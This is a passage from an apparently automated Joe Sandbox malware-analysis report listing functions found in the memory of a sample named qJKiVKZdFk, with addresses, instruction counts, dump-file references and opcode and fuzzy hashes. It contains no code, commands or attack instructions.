                                                                                                                                        • Opcode Fuzzy Hash: 28beeca3d6f3d7e4d14661f1268a62793a73c245c08e492e04ea9542e01566da
                                                                                                                                        • Instruction Fuzzy Hash: 1EB09231084208BBCB002B91EC09BC8BF69EB0C692F108020F74D44470CB62A4108A99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E422C0 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $
                                                                                                                                        • API String ID: 0-3993045852
                                                                                                                                        • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                                                        • Instruction ID: 2c9a5c6a342b4d526b647c83f987c2c197449358c0043d37b999fe9c56151354
                                                                                                                                        • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                                                        • Instruction Fuzzy Hash: BB325FB4E002299AEF619F64DC44BAEB7B9FF44704F0041EAE74DE6191DB748A80CF59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00408558 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(00403FC2,00418950,00000014), ref: 00408558
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1210537920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1210523224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210556297.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210571846.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210586886.000000000041B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210586886.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210657902.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1210657902.000000000409E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1213166908.00000000040A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                        • Opcode ID: 34d2d71641086b43951787e22f602f693dafc3b34b412f9bbbb7db2a15fdc8d1
                                                                                                                                        • Instruction ID: 56d5ab8de5572e7b5fea5a33c34fa2415f91961cdd68c14543a695de45a460ea
                                                                                                                                        • Opcode Fuzzy Hash: 34d2d71641086b43951787e22f602f693dafc3b34b412f9bbbb7db2a15fdc8d1
                                                                                                                                        • Instruction Fuzzy Hash: 5EB012B070110347470C0B39BC1804A35D4A70C242300C13D7103C65B0DF20C410AF08
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC5DF7 Relevance: .7, Instructions: 723COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                                                        • Instruction ID: 14d8a0aa9525a46c55921b2a76981e653b04cb8eea9e04a3184e6a00d3078af8
                                                                                                                                        • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                                                        • Instruction Fuzzy Hash: 3442B071629F159BC3DADF24C88055BF3E1FFC8218F048A1DD99997A90DB38F819CA91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCA026 Relevance: .5, Instructions: 478COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                                                        • Instruction ID: 00d66c194c899fb84a42b5647436e31ede4fb1ce9045761ba57d11b1cabe5416
                                                                                                                                        • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                                                        • Instruction Fuzzy Hash: 1E22EF76908B169FC714CF19D08055AFBE1FF88324F558A6EE8A9A7B10C730BA55CF81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC2B60 Relevance: .4, Instructions: 443COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                                        • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                                                        • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                                        • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC3520 Relevance: .4, Instructions: 427COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                                                        • Instruction ID: fbb9d1e30ac4f0da3e545c5cc9f0c431d878b5adc92b091e88c19ad0f6923832
                                                                                                                                        • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                                                        • Instruction Fuzzy Hash: 90028F711187058FC756EE0CD49035AF7E1FFC8305F19892DD68987B64E739A9198F82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC89D0 Relevance: .4, Instructions: 351COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                                                        • Instruction ID: bab3729246cf952ba2b13b322b8b7e73478688a6a9f17126e53145794c3f585c
                                                                                                                                        • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                                                        • Instruction Fuzzy Hash: B8C12833E2477906D764DEAF8C500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A96C0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCB0B0 Relevance: .3, Instructions: 345COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                                                        • Instruction ID: 3bc83678ccd3ba686045ca784374b7a436ef6d60de3fe6a1e6aa710d31779d58
                                                                                                                                        • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                                                        • Instruction Fuzzy Hash: AEA1EA0A8090E4ABEF455A7E80B63FBAFE9CB27354E76719284D85B793C019120FDF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC30F0 Relevance: .3, Instructions: 336COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                                                        • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                                                                                                                        • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                                                        • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCCA10 Relevance: .3, Instructions: 280COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                        • Instruction ID: 426dc79f78ba11e39312e35cf956e68cc540f715e9cc1de700699fa11940218a
                                                                                                                                        • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                        • Instruction Fuzzy Hash: 3EC18EB5E003599FCB54CFA9C885AEEFBF1FF48200F24856AD919E7301E334AA558B54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC5DE7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                                                                                                                        • Instruction ID: 00d8b61c86e0595eb700039ef378d6cfd71a5984723fdb16c64213cc4c1481fe
                                                                                                                                        • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                                                                                                                        • Instruction Fuzzy Hash: 09B183B0039FA686CBD3FF30911024BF7E0BFC525DF44094AD99986864EB3EE94E9215
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC7520 Relevance: .3, Instructions: 251COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                                                        • Instruction ID: 02285a8b1deca83fc16a20e9cd05816c8127acfb6a8ab982794a764c42f5469c
                                                                                                                                        • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                                                        • Instruction Fuzzy Hash: B4912573D187BA06D7609EAF8C441B9B7E3AFC4210F9B077ADD9467282C9309E0697D0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCC760 Relevance: .2, Instructions: 239COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                                                        • Instruction ID: ff384b362ba022bebeae1a6f802a11ce7e6d3d5788257560b5f5007c46501575
                                                                                                                                        • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                                                        • Instruction Fuzzy Hash: 21B16AB5E002599FCB84CFE9C885ADEFBF0FF48210F64816AD919E7301E334AA558B54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCA916 Relevance: .2, Instructions: 227COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                                                        • Instruction ID: 42dd1aee67712dba4dddae89532a43da9a23f36a80df88ddda6dcb06840f78db
                                                                                                                                        • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                                                        • Instruction Fuzzy Hash: EF71D473A20B258B8314DEB98D94192F2F1EF84610B57C27DCE85D7B41EB31B95A96C0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC59F7 Relevance: .2, Instructions: 216COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                                                        • Instruction ID: 304c4f8b45f6f148e54f77e6d9bc4d5eb74586bc9d99632e664bad45e374c934
                                                                                                                                        • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                                                        • Instruction Fuzzy Hash: 8A8138B2A047019FC328CF19D88566AF7E1FFD8210F15892EE99E83B41D770F8558B92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC8E60 Relevance: .2, Instructions: 207COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                                                        • Instruction ID: cc025a553deeceeb060bfc5c2365acaec4afb88eb5d91b93e6d3e74e73d33953
                                                                                                                                        • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                                                        • Instruction Fuzzy Hash: A9710622535B7A4AEBC3DA3D881046BF7D0BE4910AB85095ADCD0F3181D72EDE4E77A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCA699 Relevance: .2, Instructions: 197COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                                                        • Instruction ID: f66c1f6d4ccadd90995db367f70d222b830dfa0be9de1ad053b9964ba1be9776
                                                                                                                                        • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                                                        • Instruction Fuzzy Hash: 50812775A10B6A9BD754CF2AD8C045AFBF1FF08210B518A2ADCA583B81D334F565CFA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC9120 Relevance: .2, Instructions: 160COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                                                        • Instruction ID: 671342d33a88e02e7339ead317002e35a6cf77546df28b88685617c4322f351c
                                                                                                                                        • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                                                        • Instruction Fuzzy Hash: A461A3339046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A76DC9823642C234EA11DBD0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC7A80 Relevance: .2, Instructions: 152COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                                                        • Instruction ID: 150ab123a3f839a6519b904f736428dd6f27d0bc51e97cc11d46584306086d2a
                                                                                                                                        • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                                                        • Instruction Fuzzy Hash: 66618C3391262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC7880 Relevance: .1, Instructions: 148COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                                                        • Instruction ID: 1121973e24e2e57ce7b1cfb2a1432977bddb1e9723aadda85b93d49799d78fe7
                                                                                                                                        • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                                                        • Instruction Fuzzy Hash: 6151DD229257BA45EFC3DA3D88504AEBBE0BE49106B46055BDCD0B3181C72EDE4DB7E4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC7220 Relevance: .1, Instructions: 128COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                                                        • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                                                                                                                                        • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                                                        • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0441671C Relevance: .1, Instructions: 105COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213315113.0000000004415000.00000040.00000020.00020000.00000000.sdmp, Offset: 04415000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4415000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                                                        • Instruction ID: 3a30b9253edb1ed8520bf7927a3ba326d7cc26afe72844921ffa7966c0892b4f
                                                                                                                                        • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                                                        • Instruction Fuzzy Hash: BD3167398062429FDF15CF74D890AB6BB70EF87324F1A999ED0C58B126D326E04BC794
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC70E0 Relevance: .1, Instructions: 99COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                                                        • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                                                                                                                                        • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                                                        • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DC7393 Relevance: .1, Instructions: 92COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                                                                                                                        • Instruction ID: 76d9c1a60832e043dcc94f2a8069fae4eaa56c90a9893c07c05087600ee4f070
                                                                                                                                        • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
